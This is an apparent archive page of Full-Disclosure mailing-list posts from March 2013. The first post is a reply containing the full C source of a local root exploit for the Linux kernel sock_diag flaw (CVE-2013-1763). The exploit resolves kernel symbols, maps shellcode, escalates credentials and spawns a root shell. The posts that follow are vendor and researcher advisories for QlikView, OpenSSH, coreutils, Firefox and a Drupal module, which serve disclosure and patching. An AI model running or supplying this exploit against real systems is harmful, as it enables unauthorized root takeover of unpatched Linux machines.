Re: [Full-disclosure] CVE-2013-1763 Ubuntu 12.10 64bit
Hi,
Any particular reason for using flow_cache_global-percpu instead of
nl_table-rehash_time as in the original exploit? It just seems less
reliable.
Here is the PoC for Fedora 18 x86_64, using nl_table.
tweek
Original Message
Subject: [Full-disclosure] CVE-2013-1763 Ubuntu 12.10 64bit
Date: Mon, 11 Mar 2013 15:50:03 +0100
From: Kacper Szczesniak kac...@qwe.pl
To: full-disclosure@lists.grok.org.uk
Hi All,
Didn't find a working poc for 64bit Ubuntu so I wrote a quick mockup.
kacper
/*
* CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
* This exploit uses nl_table to jump to a known location
*/
#include unistd.h
#include sys/socket.h
#include linux/netlink.h
#include netinet/tcp.h
#include errno.h
#include linux/if.h
#include linux/filter.h
#include string.h
#include stdio.h
#include stdlib.h
#include linux/sock_diag.h
#include linux/inet_diag.h
#include linux/unix_diag.h
#include sys/mman.h
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*
_prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;
int __attribute__((regparm(3)))
kernel_code()
{
commit_creds(prepare_kernel_cred(0));
return -1;
}
unsigned long
get_symbol(char *name)
{
FILE *f;
unsigned long addr;
char dummy, sym[512];
int ret = 0;
f = fopen(/proc/kallsyms, r);
if (!f) {
return 0;
}
while (ret != EOF) {
ret = fscanf(f, %p %c %s\n, (void **) addr, dummy, sym);
if (ret == 0) {
fscanf(f, %s\n, sym);
continue;
}
if (!strcmp(name, sym)) {
printf([+] resolved symbol %s to %p\n, name, (void *) addr);
fclose(f);
return addr;
}
}
fclose(f);
return 0;
}
int main(int argc, char*argv[])
{
int fd;
unsigned family;
struct {
struct nlmsghdr nlh;
struct unix_diag_req r;
} req;
charbuf[8192];
if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) 0){
printf(Can't create sock diag socket\n);
return -1;
}
memset(req, 0, sizeof(req));
req.nlh.nlmsg_len = sizeof(req);
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
req.nlh.nlmsg_seq = 123456;
req.r.udiag_states = -1;
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
commit_creds = (_commit_creds) get_symbol(commit_creds);
prepare_kernel_cred = (_prepare_kernel_cred)
get_symbol(prepare_kernel_cred);
sock_diag_handlers = get_symbol(sock_diag_handlers);
nl_table = get_symbol(nl_table);
if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers ||
!nl_table){
printf(some symbols are not available!\n);
exit(1);
}
family = (nl_table - sock_diag_handlers) / 8;
printf(family=%d\n,family);
req.r.sdiag_family = family;
if(family255){
printf(nl_table is too far!\n);
exit(1);
}
unsigned long mmap_start, mmap_size;
mmap_start = 0x1;
mmap_size = 0x20;
printf(mmapping at 0x%lx, size = 0x%lx\n, mmap_start, mmap_size);
if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
printf(mmap fault\n);
exit(1);
}
memset((void*)mmap_start, 0x90, mmap_size);
char jump[] = \x55 // push %ebp
\x48\x89\xe5 // mov %rsp, %rbp
\x48\xc7\xc0\x00\x00\x00\x00 // movabs 0x00, %rax
\xff\xd0 // call *%rax
\x5d // pop %rbp
\xc3; // ret
unsigned int *asd = (unsigned int*) jump[7];
*asd = (unsigned int)kernel_code;
printf(kernel_code = %x\n, (unsigned int) kernel_code);
memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));
if ( send(fd, req, sizeof(req), 0) 0) {
printf(bad send\n);
close(fd);
return -1;
}
printf(uid=%d, euid=%d\n,getuid(), geteuid() );
if(!getuid())
system(/bin/sh);
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20130313-0 :: QlikView Desktop Client Integer Overflow
SEC Consult Vulnerability Lab Security Advisory 20130313-0 === title: QlikView Desktop Client Integer Overflow product: QlikView Desktop Client vulnerable version: 11.00 SR2 fixed version: 11.20 SR1 CVE: impact: High homepage: http://www.qlikview.com/ found: 2012-10-22 by: A. Antukh, M. Lucinskij SEC Consult Vulnerability Lab https://www.sec-consult.com === Vendor description: --- QlikView is a new kind of business intelligence software that changes your world. Its BI software that lets you stop guessing and start knowing how to make faster, smarter decisions. Source: http://www.qlikview.com/us/explore Vulnerability overview/description: --- An integer overflow vulnerability exists in the .qvw file format parser. A parameter that is responsible for the section length is checked improperly, which causes a heap overflow if any value bigger than 0x8000 is set. Successful exploitation of this vulnerability could result in an arbitrary code execution within the QlikView Desktop client. Vulnerability details: -- The .qvw file is divided into several sections with a specified delimiter. Among others, there is a parameter which is responsible for defining the section length. On the hex listing below it's the DWORD A4 00 00 00 (address 315EF) 000315B0: 00 00 01 00-00 00 0E 23-23 23 23 23-23 23 23 23 000315C0: 23 23 23 23-23 01 2E 00-00 00 00 00-00 00 00 00 000315D0: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 03 000315E0: 00 00 00 00-00 00 00 90-02 00 00 00-00 04 00 A4 000315F0: 00 00 00 78-9C 3D CC CB-4A 02 50 14-86 D1 1F 47 If by any reasons the value is bigger than the actual size of the section, an error is handled by a C++ EH and a message Document failed to load is shown. The check condition can be seen here: .text:00D6BD66 mov eax, [edi+28h] .text:00D6BD69 mov ebx, [eax] ; here is the length parameter .text:00D6BD6B add eax, 4 .text:00D6BD6E mov [edi+28h], eax .text:00D6BD71 cmp ebx, [ebp+var_14] .text:00D6BD74 jg loc_D6BBAC ; check if the parameter value is bigger than actual length However, the comparison operates with a signed number and doesn't check if it's less than zero. In other words, if an attacker supplies a DWORD bigger than 0x8000, the jump will not be taken (as the number will be considered as negative), causing an integer overflow. After that, the length parameter is used as the DstSize argument to the CArchive::Read function: .text:00D6BD7A mov eax, [ebp+Dst] .text:00D6BD7D pushebx ; DstSize .text:00D6BD7E pusheax ; Dst .text:00D6BD7F mov ecx, edi .text:00D6BD81 call?Read@CArchive@@QAEIPAXI@Z ; CArchive::Read(void *,uint) A large amount of data is read. It is used later to fill the created Archive whose size is 0x8000: .text:00B26207 push0 .text:00B26209 push8000h .text:00B2620E push1 .text:00B26210 lea eax, [ebp+var_60] .text:00B26213 pusheax .text:00B26214 lea ecx, [ebp+var_A8] .text:00B2621A call??0CArchive@@QAE@PAVCFile@@IHPAX@Z ; CArchive::CArchive(CFile *,uint,int,void *) This results in the controlled address being overwritten with the controlled value. .text:009F3092 mov ecx, [esi] .text:009F3094 mov edx, [esi+4] .text:009F3097 mov [ecx+4], edx; here the error occurs; .text:009F3097 ; trying to write at non-existing address An extract from a debugger with the occurence of the error is presented below. eax=04735f14 ebx= ecx=bbb7 edx=aaa6 esi=04b2fbc0 edi=04735f10 eip=01723097 esp=003527f8 ebp=00352818 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 Qv+0x5f3097: 01723097 895104 mov dword ptr [ecx+4],edx ds:002b:= Vulnerable / tested versions: - The vulnerability has been verified to exist in QlikView 11.00 SR2, which was the most recent version at the time of discovery. Vendor contact timeline: 2012-11-08: Contacted vendor through supp...@qlikview.com 2012-11-12: Initial vendor response - issue will be verified 2012-12-13
[Full-disclosure] [ MDVSA-2013:022 ] openssh
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2013:022 http://www.mandriva.com/en/support/security/ ___ Package : openssh Date: March 13, 2013 Affected: Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in openssh: The auth_parse_options function in auth-options.c in sshd in OpenSSH before 5.7 provides debug messages containing authorized_keys command options, which allows remote authenticated users to obtain potentially sensitive information by reading these messages, as demonstrated by the shared user account required by Gitolite. NOTE: this can cross privilege boundaries because a user account may intentionally have no shell or filesystem access, and therefore may have no supported way to read an authorized_keys file in its own home directory (CVE-2012-0814). The default configuration of OpenSSH through 6.1 enforces a fixed time limit between establishing a TCP connection and completing a login, which makes it easier for remote attackers to cause a denial of service (connection-slot exhaustion) by periodically making many new TCP connections (CVE-2010-5107). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5107 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0814 ___ Updated Packages: Mandriva Enterprise Server 5: d4dc59e94c2f0f4ca4ed3d29c05afd9d mes5/i586/openssh-5.1p1-2.3mdvmes5.2.i586.rpm 6bb053a5d82451594d433c0059c5f7a7 mes5/i586/openssh-askpass-5.1p1-2.3mdvmes5.2.i586.rpm cc26585ed65704d2fa6c0bcb102953c7 mes5/i586/openssh-askpass-common-5.1p1-2.3mdvmes5.2.i586.rpm 06ded6e5614c7a188a676550934e98bb mes5/i586/openssh-askpass-gnome-5.1p1-2.3mdvmes5.2.i586.rpm 860932e1a599ec68a150879b9c9abe52 mes5/i586/openssh-clients-5.1p1-2.3mdvmes5.2.i586.rpm fe26afea6473e680a45979a904bb7e3d mes5/i586/openssh-server-5.1p1-2.3mdvmes5.2.i586.rpm baa4beb7bfb76b7706166e7870ddd210 mes5/SRPMS/openssh-5.1p1-2.3mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 1c43725b46c279b7295c16e0fb9f43bf mes5/x86_64/openssh-5.1p1-2.3mdvmes5.2.x86_64.rpm d0231e13471148dfed86f75c4f99a2d0 mes5/x86_64/openssh-askpass-5.1p1-2.3mdvmes5.2.x86_64.rpm 2c06080b369ab13a9c95df47336aeb13 mes5/x86_64/openssh-askpass-common-5.1p1-2.3mdvmes5.2.x86_64.rpm 9fc99fb86e43c00139329787c7b3829d mes5/x86_64/openssh-askpass-gnome-5.1p1-2.3mdvmes5.2.x86_64.rpm 63621dfc8b9c4bf731711af418ea5c5f mes5/x86_64/openssh-clients-5.1p1-2.3mdvmes5.2.x86_64.rpm ea5653a3e6d790ce02f11fbcd722801d mes5/x86_64/openssh-server-5.1p1-2.3mdvmes5.2.x86_64.rpm baa4beb7bfb76b7706166e7870ddd210 mes5/SRPMS/openssh-5.1p1-2.3mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFRQFi+mqjQ0CJFipgRAuIuAJ9D6e15JXI7YDeAIZqQalKdXEmEWwCgjBoe quBwSmmMLE/orEkpMzGwKbQ= =PJAx -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2013:023 ] coreutils
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2013:023 http://www.mandriva.com/en/support/security/ ___ Package : coreutils Date: March 13, 2013 Affected: Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in coreutils: Long line inputs could trigger a segfault in the sort, uniq and join utilities (CVE-2013-0221, CVE-2013-0222, CVE-2013-0223). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0221 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0222 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0223 https://bugzilla.novell.com/show_bug.cgi?id=798538 https://bugzilla.novell.com/show_bug.cgi?id=796243 https://bugzilla.novell.com/show_bug.cgi?id=798541 ___ Updated Packages: Mandriva Enterprise Server 5: e119161cd57b34c1faa1116167fd2dee mes5/i586/coreutils-6.12-2.6mdvmes5.2.i586.rpm dd979ecd771a2703e881595814e6eb17 mes5/i586/coreutils-doc-6.12-2.6mdvmes5.2.i586.rpm 9861a796e1eaaa130e175e9660ad0711 mes5/SRPMS/coreutils-6.12-2.6mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 64f630d1e0fc0f97aec572a1f1f6f48f mes5/x86_64/coreutils-6.12-2.6mdvmes5.2.x86_64.rpm c3a94ab9eaebfad4bd1cbffe8f3cb10b mes5/x86_64/coreutils-doc-6.12-2.6mdvmes5.2.x86_64.rpm 9861a796e1eaaa130e175e9660ad0711 mes5/SRPMS/coreutils-6.12-2.6mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFRQHMQmqjQ0CJFipgRAgRQAJ0W+wyHdG5tk7XAQGJsZL4KON0zCgCgvwf4 rZJBw2UBarl1PaG56D3eoqA= =5ffG -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2013:024 ] firefox
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2013:024 http://www.mandriva.com/en/support/security/ ___ Package : firefox Date: January 13, 2013 Affected: Enterprise Server 5.0 ___ Problem Description: A security issue was identified and fixed in mozilla firefox: VUPEN Security, via TippingPoint#039;s Zero Day Initiative, reported a use-after-free within the HTML editor when content script is run by the document.execCommand() function while internal editor operations are occurring. This could allow for arbitrary code execution (CVE-2013-0787). The mozilla firefox packages has been upgraded to the latest ESR version which is unaffected by this security flaw. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0787 http://www.mozilla.org/security/announce/2013/mfsa2013-29.html ___ Updated Packages: Mandriva Enterprise Server 5: 2c37f101824b6a75260d6be2ba6526f4 mes5/i586/firefox-17.0.4-0.1mdvmes5.2.i586.rpm 067ef1b5cb43e108598783bb2ca3e904 mes5/i586/firefox-af-17.0.4-0.1mdvmes5.2.i586.rpm a9b33290ee48559ab9bf552c11a77867 mes5/i586/firefox-ar-17.0.4-0.1mdvmes5.2.i586.rpm 56eede1229650b50f838c4d62cf3088f mes5/i586/firefox-be-17.0.4-0.1mdvmes5.2.i586.rpm 2f1ed6761c118ca1d499c996c267fd5c mes5/i586/firefox-bg-17.0.4-0.1mdvmes5.2.i586.rpm 0af0df661fdf99dce981a34105bf3db2 mes5/i586/firefox-bn-17.0.4-0.1mdvmes5.2.i586.rpm 4fbacdfae22286a4d1565f5e07a99e59 mes5/i586/firefox-ca-17.0.4-0.1mdvmes5.2.i586.rpm 3ea6ca41d6d738d7b8fbb285e78d06f7 mes5/i586/firefox-cs-17.0.4-0.1mdvmes5.2.i586.rpm 7735a4756a43b940cd288f486e7d2de9 mes5/i586/firefox-cy-17.0.4-0.1mdvmes5.2.i586.rpm 9bec5943921b3bddcc4e3497d027fc2d mes5/i586/firefox-da-17.0.4-0.1mdvmes5.2.i586.rpm 0b9041b5eaf52e7e06dd3437626620a4 mes5/i586/firefox-de-17.0.4-0.1mdvmes5.2.i586.rpm 5cc0c1b6523e17c8d79d678d7d7aad53 mes5/i586/firefox-devel-17.0.4-0.1mdvmes5.2.i586.rpm e9a01322cd40f797ba03b52d58671b86 mes5/i586/firefox-el-17.0.4-0.1mdvmes5.2.i586.rpm 22cc5f00f67563a7734bdced5e1d7bfb mes5/i586/firefox-en_GB-17.0.4-0.1mdvmes5.2.i586.rpm 0aebbb068c1d4d85b1b2827d5b5b2431 mes5/i586/firefox-eo-17.0.4-0.1mdvmes5.2.i586.rpm a57a4e00740b7babfcb51b0328fc135f mes5/i586/firefox-es_AR-17.0.4-0.1mdvmes5.2.i586.rpm 9710fd28c150da0eb976fa8347b9cd86 mes5/i586/firefox-es_ES-17.0.4-0.1mdvmes5.2.i586.rpm e66547fd26bd582df43ff480895f6674 mes5/i586/firefox-et-17.0.4-0.1mdvmes5.2.i586.rpm 90e1a82354eb2aee9eba6b0bdc4dda92 mes5/i586/firefox-eu-17.0.4-0.1mdvmes5.2.i586.rpm 32e588d40734ae29f2fc84c37f4468ea mes5/i586/firefox-fi-17.0.4-0.1mdvmes5.2.i586.rpm 4140a4088ffb39522548b24f1294d752 mes5/i586/firefox-fr-17.0.4-0.1mdvmes5.2.i586.rpm 1202edce26a621ee77e458766e2c9026 mes5/i586/firefox-fy-17.0.4-0.1mdvmes5.2.i586.rpm 6099e1f5dd1b0529b205a89327169aed mes5/i586/firefox-ga_IE-17.0.4-0.1mdvmes5.2.i586.rpm 13818d623506c2f2c94752c54d4b379d mes5/i586/firefox-gl-17.0.4-0.1mdvmes5.2.i586.rpm bf5e73d3f9b7aeb7d6b4d32751615211 mes5/i586/firefox-gu_IN-17.0.4-0.1mdvmes5.2.i586.rpm a324f1da21be53ce595dcbb446a3f95f mes5/i586/firefox-he-17.0.4-0.1mdvmes5.2.i586.rpm efd3a7d1712e3c49a5105f8568bf3413 mes5/i586/firefox-hi-17.0.4-0.1mdvmes5.2.i586.rpm a47c70e2a0af9886942f7b8b36aae01d mes5/i586/firefox-hu-17.0.4-0.1mdvmes5.2.i586.rpm dee1f90622dcc9e52ec07b92132a73bf mes5/i586/firefox-id-17.0.4-0.1mdvmes5.2.i586.rpm 5f63f198f5a332a65029ec6773339087 mes5/i586/firefox-is-17.0.4-0.1mdvmes5.2.i586.rpm be0fb5af91ead3cc9e659ca36d6907ce mes5/i586/firefox-it-17.0.4-0.1mdvmes5.2.i586.rpm 75466d58f640181559cf203f9766e223 mes5/i586/firefox-ja-17.0.4-0.1mdvmes5.2.i586.rpm f0be98911d65cf3d9f0ccba7eb39861a mes5/i586/firefox-kn-17.0.4-0.1mdvmes5.2.i586.rpm 20ec7397f0df85a5821df4c2ab698671 mes5/i586/firefox-ko-17.0.4-0.1mdvmes5.2.i586.rpm b9237e59391bc7f9f82bcb798b2e5822 mes5/i586/firefox-ku-17.0.4-0.1mdvmes5.2.i586.rpm 991acfb783d2088c74f6cef901be39eb mes5/i586/firefox-lt-17.0.4-0.1mdvmes5.2.i586.rpm de4073f73eee8d334746cc8bf897197a mes5/i586/firefox-lv-17.0.4-0.1mdvmes5.2.i586.rpm da1fd3d4c29ac26717fae391779b931a mes5/i586/firefox-mk-17.0.4-0.1mdvmes5.2.i586.rpm 7e306e1eb4301b80f6d21b9a836f1f16 mes5/i586/firefox-mr-17.0.4-0.1mdvmes5.2.i586.rpm 8b776ce85ce48c83210417dc0963615b mes5/i586/firefox-nb_NO-17.0.4-0.1mdvmes5.2.i586.rpm 68006e43d84cc0ed69b03f15bdfd21c0 mes5/i586/firefox-nl-17.0.4-0.1mdvmes5.2.i586.rpm 0aaac65bb81de7df1915f719721b9bde mes5/i586/firefox-nn_NO-17.0.4-0.1mdvmes5.2.i586.rpm a36ca1ab708abfbf97dfe15ffbcd70c4
[Full-disclosure] [Security-news] SA-CONTRIB-2013-034 - Node Parameter Control - Access Bypass
View online: http://drupal.org/node/1942330 * Advisory ID: DRUPAL-SA-CONTRIB-2013-034 * Project: Node Parameter Control [1] (third-party module) * Version: 6.x * Date: 2013-Mar-13 * Security risk: Critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - This module enables you to limit the visibility of the fields on the node edit form. The module doesn't sufficiently check access before allowing users to view and edit the configuration options allowing anonymous and authenticated users the ability to view and edit the configuration options. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * All 6.x-1.x versions Drupal core is not affected. If you do not use the contributed Node Parameter Control [4] module, there is nothing you need to do. SOLUTION Uninstall the module. No patched version is available. Also see the Node Parameter Control [5] project page. REPORTED BY - * Talbot [6] FIXED BY The module maintainer opted to mark the module as unsupported. COORDINATED BY -- * Lee Rowlands [7] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [8]. Learn more about the Drupal Security team and their policies [9], writing secure code for Drupal [10], and securing your site [11]. [1] http://drupal.org/project/node_parameter_control [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/node_parameter_control [5] http://drupal.org/project/node_parameter_control [6] http://drupal.org/user/36138 [7] http://drupal.org/user/395439 [8] http://drupal.org/contact [9] http://drupal.org/security-team [10] http://drupal.org/writing-secure-code [11] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
